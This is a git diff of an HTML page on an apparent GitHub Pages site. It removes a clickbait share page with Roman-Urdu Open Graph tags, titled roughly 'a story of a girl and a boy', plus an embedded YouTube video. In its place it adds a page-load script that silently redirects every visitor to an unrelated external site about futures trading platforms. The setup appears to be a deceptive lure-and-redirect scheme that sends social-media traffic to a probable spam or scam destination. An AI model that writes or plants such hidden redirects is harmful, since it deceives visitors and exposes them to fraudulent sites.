--- a/5434533.HTML
+++ b/5434533.HTML
@@ -1,12 +1,6 @@
-<meta property="og:type" content="Article" />
-	<meta property="og:url" content="https://Priyakumarii.github.io/priya/5434533.HTML" />
-	<meta property="og:site_name" content="Github" />
-	<meta property="og:title" content="Aik Larki aur larkay ki kahaani" />
-	<meta property="og:image" content="https://raw.githubusercontent.com/Priyakumarii/priya/master/be.jpg" /> 
-	<meta property="og:description" content="Deikh kar batai kaisi lagi" />
-	<meta property="og:image:alt" content="Aik Larki aur larkay ki kahaani" />
-	<html>
-			<head></head>
-			<body>
-			<iframe width="340" height="190" src="https://www.youtube.com/embed/72lValALTzw?rel=0&amp;controls=0&amp;showinfo=0" frameborder="0" allow="autoplay; encrypted-media" allowfullscreen></iframe>
-			</body></html>
+<html>
+<head>
+<meta property="og:url" content="https://raw.githubusercontent.com/Priyakumarii/priya/master/be.jpg" />
+<script type="text/javascript">window.location = "http://businesscover.me/simulated-futures-trading-platforms/";</script>
+</head>
+</html>
